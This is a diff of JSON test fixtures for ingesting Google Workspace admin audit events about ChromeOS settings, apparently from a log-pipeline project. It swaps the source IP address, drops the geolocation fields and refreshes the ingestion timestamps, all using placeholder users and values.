"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_ANDROID_APPLICATION_SETTING\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"2345\"},{\"name\":\"CHROME_OS_SESSION_TYPE\",\"value\":\"type\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", + "ingested": "2021-12-09T13:38:27.668031200Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_ANDROID_APPLICATION_SETTING\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"2345\"},{\"name\":\"CHROME_OS_SESSION_TYPE\",\"value\":\"type\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "CHANGE_CHROME_OS_ANDROID_APPLICATION_SETTING", "id": "1", @@ -93,7 +75,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -115,35 +97,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:18.974599100Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_DEVICE_STATE\",\"parameters\":[{\"name\":\"DEVICE_NEW_STATE\",\"value\":\"new\"},{\"name\":\"DEVICE_PREVIOUS_STATE\",\"value\":\"prev\"},{\"name\":\"DEVICE_SERIAL_NUMBER\",\"value\":\"1234\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}", + "ingested": "2021-12-09T13:38:27.668040300Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_DEVICE_STATE\",\"parameters\":[{\"name\":\"DEVICE_NEW_STATE\",\"value\":\"new\"},{\"name\":\"DEVICE_PREVIOUS_STATE\",\"value\":\"prev\"},{\"name\":\"DEVICE_SERIAL_NUMBER\",\"value\":\"1234\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}", "provider": "admin", "action": "CHANGE_DEVICE_STATE", "id": "1", @@ -173,7 +137,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -197,35 +161,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:18.974604500Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_APPLICATION_SETTING\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"2345\"},{\"name\":\"CHROME_OS_SESSION_TYPE\",\"value\":\"type\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", + "ingested": "2021-12-09T13:38:27.668045400Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_APPLICATION_SETTING\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"2345\"},{\"name\":\"CHROME_OS_SESSION_TYPE\",\"value\":\"type\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "CHANGE_CHROME_OS_APPLICATION_SETTING", "id": "1", @@ -256,7 +202,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -280,35 +226,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:18.974610200Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"SEND_CHROME_OS_DEVICE_COMMAND\",\"parameters\":[{\"name\":\"DEVICE_SERIAL_NUMBER\",\"value\":\"2345\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", + "ingested": "2021-12-09T13:38:27.668050400Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"SEND_CHROME_OS_DEVICE_COMMAND\",\"parameters\":[{\"name\":\"DEVICE_SERIAL_NUMBER\",\"value\":\"2345\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", "provider": "admin", "action": "SEND_CHROME_OS_DEVICE_COMMAND", "id": "1", @@ -338,7 +266,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -362,35 +290,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:18.974614500Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_DEVICE_ANNOTATION\",\"parameters\":[{\"name\":\"DEVICE_SERIAL_NUMBER\",\"value\":\"2345\"}]}}", + "ingested": "2021-12-09T13:38:27.668056100Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_DEVICE_ANNOTATION\",\"parameters\":[{\"name\":\"DEVICE_SERIAL_NUMBER\",\"value\":\"2345\"}]}}", "provider": "admin", "action": "CHANGE_CHROME_OS_DEVICE_ANNOTATION", "id": "1", @@ -420,7 +330,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -442,35 +352,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:18.974619100Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_DEVICE_SETTING\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", + "ingested": "2021-12-09T13:38:27.668060700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_DEVICE_SETTING\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "CHANGE_CHROME_OS_DEVICE_SETTING", "id": "1", @@ -501,7 +393,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -523,35 +415,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:18.974623400Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_DEVICE_STATE\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"DEVICE_SERIAL_NUMBER\",\"value\":\"1234\"}]}}", + "ingested": "2021-12-09T13:38:27.668065200Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_DEVICE_STATE\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"DEVICE_SERIAL_NUMBER\",\"value\":\"1234\"}]}}", "provider": "admin", "action": "CHANGE_CHROME_OS_DEVICE_STATE", "id": "1", @@ -581,7 +455,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -603,35 +477,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:18.974627600Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_PUBLIC_SESSION_SETTING\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", + "ingested": "2021-12-09T13:38:27.668069700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_PUBLIC_SESSION_SETTING\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "CHANGE_CHROME_OS_PUBLIC_SESSION_SETTING", "id": "1", @@ -662,7 +518,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -686,35 +542,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:18.974631800Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"INSERT_CHROME_OS_PRINT_SERVER\",\"parameters\":[{\"name\":\"PRINT_SERVER_NAME\",\"value\":\"server\"}]}}", + "ingested": "2021-12-09T13:38:27.668073700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"INSERT_CHROME_OS_PRINT_SERVER\",\"parameters\":[{\"name\":\"PRINT_SERVER_NAME\",\"value\":\"server\"}]}}", "provider": "admin", "action": "INSERT_CHROME_OS_PRINT_SERVER", "id": "1", @@ -744,7 +582,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -768,35 +606,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:18.974635800Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"DELETE_CHROME_OS_PRINT_SERVER\",\"parameters\":[{\"name\":\"PRINT_SERVER_NAME\",\"value\":\"server\"}]}}", + "ingested": "2021-12-09T13:38:27.668078700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"DELETE_CHROME_OS_PRINT_SERVER\",\"parameters\":[{\"name\":\"PRINT_SERVER_NAME\",\"value\":\"server\"}]}}", "provider": "admin", "action": "DELETE_CHROME_OS_PRINT_SERVER", "id": "1", @@ -826,7 +646,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -850,35 +670,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:18.974639700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"UPDATE_CHROME_OS_PRINT_SERVER\",\"parameters\":[{\"name\":\"PRINT_SERVER_NAME\",\"value\":\"server\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:27.668084500Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"UPDATE_CHROME_OS_PRINT_SERVER\",\"parameters\":[{\"name\":\"PRINT_SERVER_NAME\",\"value\":\"server\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "UPDATE_CHROME_OS_PRINT_SERVER", "id": "1", @@ -908,7 +710,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -932,35 +734,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:18.974644Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"INSERT_CHROME_OS_PRINTER\",\"parameters\":[{\"name\":\"PRINTER_NAME\",\"value\":\"printer\"}]}}", + "ingested": "2021-12-09T13:38:27.668090800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"INSERT_CHROME_OS_PRINTER\",\"parameters\":[{\"name\":\"PRINTER_NAME\",\"value\":\"printer\"}]}}", "provider": "admin", "action": "INSERT_CHROME_OS_PRINTER", "id": "1", @@ -990,7 +774,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1014,35 +798,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:18.974648100Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"DELETE_CHROME_OS_PRINTER\",\"parameters\":[{\"name\":\"PRINTER_NAME\",\"value\":\"printer\"}]}}", + "ingested": "2021-12-09T13:38:27.668096500Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"DELETE_CHROME_OS_PRINTER\",\"parameters\":[{\"name\":\"PRINTER_NAME\",\"value\":\"printer\"}]}}", "provider": "admin", "action": "DELETE_CHROME_OS_PRINTER", "id": "1", @@ -1072,7 +838,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1096,35 +862,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:18.974652300Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"UPDATE_CHROME_OS_PRINTER\",\"parameters\":[{\"name\":\"PRINTER_NAME\",\"value\":\"printer\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:27.668102100Z", + "original": 